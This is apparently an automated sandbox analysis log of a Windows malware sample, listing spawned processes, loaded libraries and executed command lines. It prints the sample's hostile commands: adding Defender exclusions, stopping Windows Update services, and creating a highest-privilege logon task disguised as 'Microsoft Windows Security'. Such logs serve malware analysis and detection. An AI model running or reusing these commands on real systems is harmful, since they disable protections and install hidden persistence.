                                Source: C:\Users\user\AppData\Local\Temp\2573513776.exeCommand line argument: L$~25_2_007E10A0
                                Source: C:\Users\user\AppData\Local\Temp\2573513776.exeCommand line argument: $~25_2_007E10A0
                                Source: lJ4EzPSKMj.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: C:\Users\user\AppData\Local\Temp\513318274.exeSystem information queried: HandleInformationJump to behavior
                                Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                                Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: lJ4EzPSKMj.exeReversingLabs: Detection: 71%
                                Source: unknownProcess created: C:\Users\user\Desktop\lJ4EzPSKMj.exe "C:\Users\user\Desktop\lJ4EzPSKMj.exe"
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeProcess created: C:\Users\user\AppData\Local\Temp\5232.scr "C:\Users\user\AppData\Local\Temp\5232.scr" /S
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrProcess created: C:\Windows\sysppvrdnvs.exe C:\Windows\sysppvrdnvs.exe
                                Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop UsoSvc
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop WaaSMedicSvc
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop wuauserv
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop DoSvc
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop BITS /wait
                                Source: unknownProcess created: C:\Windows\sysppvrdnvs.exe "C:\Windows\sysppvrdnvs.exe"
                                Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Users\user\AppData\Local\Temp\513318274.exe C:\Users\user\AppData\Local\Temp\513318274.exe
                                Source: C:\Users\user\AppData\Local\Temp\513318274.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\513318274.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /f /tn "Windows Upgrade Manager"
                                Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Users\user\AppData\Local\Temp\2573513776.exe C:\Users\user\AppData\Local\Temp\2573513776.exe
                                Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Users\user\AppData\Local\Temp\28849683.exe C:\Users\user\AppData\Local\Temp\28849683.exe
                                Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Users\user\AppData\Local\Temp\15714163.exe C:\Users\user\AppData\Local\Temp\15714163.exe
                                Source: C:\Users\user\AppData\Local\Temp\28849683.exeProcess created: C:\Users\user\AppData\Local\Temp\1428024550.exe C:\Users\user\AppData\Local\Temp\1428024550.exe
                                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: unknownProcess created: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe "C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe"
                                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe
                                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeProcess created: C:\Windows\System32\dwm.exe C:\Windows\System32\dwm.exe
                                Source: unknownProcess created: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe "C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe"
                                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeProcess created: C:\Users\user\AppData\Local\Temp\5232.scr "C:\Users\user\AppData\Local\Temp\5232.scr" /SJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrProcess created: C:\Windows\sysppvrdnvs.exe C:\Windows\sysppvrdnvs.exeJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"Jump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /waitJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Users\user\AppData\Local\Temp\513318274.exe C:\Users\user\AppData\Local\Temp\513318274.exeJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Users\user\AppData\Local\Temp\2573513776.exe C:\Users\user\AppData\Local\Temp\2573513776.exeJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Users\user\AppData\Local\Temp\28849683.exe C:\Users\user\AppData\Local\Temp\28849683.exeJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Users\user\AppData\Local\Temp\15714163.exe C:\Users\user\AppData\Local\Temp\15714163.exeJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop UsoSvcJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop WaaSMedicSvcJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop wuauservJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop DoSvcJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop BITS /waitJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\513318274.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /fJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\513318274.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /fJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /f /tn "Windows Upgrade Manager"
                                Source: C:\Users\user\AppData\Local\Temp\28849683.exeProcess created: C:\Users\user\AppData\Local\Temp\1428024550.exe C:\Users\user\AppData\Local\Temp\1428024550.exe
                                Source: C:\Users\user\AppData\Local\Temp\1428024550.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                Source: C:\Users\user\AppData\Local\Temp\1428024550.exeProcess created: unknown unknown
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeProcess created: C:\Windows\System32\dwm.exe C:\Windows\System32\dwm.exe
                                Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                Source: C:\Windows\System32\conhost.exeProcess created: unknown unknown
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\lJ4EzPSKMj.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5232.scrSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: firewallapi.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: fwbase.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeSection loaded: netutils.dllJump to behavior
